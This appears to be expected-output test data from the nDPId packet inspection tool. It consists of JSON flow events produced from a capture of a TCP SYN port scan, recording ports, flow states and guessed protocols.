-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 